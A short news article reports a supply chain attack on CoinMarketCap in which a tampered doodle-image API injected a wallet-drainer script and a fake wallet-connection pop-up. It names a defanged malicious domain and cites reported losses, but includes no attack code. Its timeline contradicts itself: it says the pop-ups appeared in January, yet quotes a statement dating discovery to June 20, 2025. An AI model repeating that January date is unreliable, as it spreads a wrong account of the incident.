CoinMarketCap, a leading cryptocurrency price tracking site, was recently targeted in a supply chain attack that exposed visitors to a wallet-drainer scam. The attack tricked users into connecting their cryptocurrency wallets, leading to the theft of funds.
Earlier this year in January, visitors to CoinMarketCap’s homepage began seeing pop-up prompts asking them to connect their crypto wallets. These popups appeared legitimate, mimicking a standard Web3 wallet connection request. However, once users connected their wallets, a malicious script executed and drained their cryptocurrency.
CoinMarketCap later confirmed that attackers exploited a vulnerability in the homepage’s doodle image to inject malicious JavaScript into the site. This vulnerability was traced to a tampered API call linked to the doodle image, which led to the fake wallet connection popup being displayed to users.
This attack is classified as a supply chain attack, meaning the breach didn’t target CoinMarketCap’s own servers but rather an external service it relied on. The attackers modified the API used by CoinMarketCap to retrieve the doodle image, injecting a malicious script tag into the JSON payload. This tag then loaded the wallet-draining script from an external domain, static.cdnkit[.]io.
Upon discovering the breach they moved quickly to address the issue and confirmed that all systems are operational and secure in a statement on their Twitter/X profile:
On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected pop-up for some users when visited our homepage.…
— CoinMarketCap (@CoinMarketCap) June 21, 2025
They’ve also confirmed that all systems are fully operational and secure.
Cybersecurity firm c/side reported that the attack resulted in over $40,000 stolen from over 100 users. The attackers, who communicated in French, shared a screenshot of their drainer panel on the Telegram messaging application, providing insight into the scale of the theft.
Cyberattacks are growing, especially those targeted at the cryptocurrency ecosystem like these wallet-draining attacks. They often target users who unknowingly connect their wallets to malicious sites or applications. Unlike traditional phishing schemes, wallet drainers are typically spread through social media, advertisements, and malicious browser extensions.
Users should exercise caution when connecting their wallets to any site. Always verify wallet connection requests and contact your exchange or stay informed about emerging security threats in the crypto space.
Leave a Reply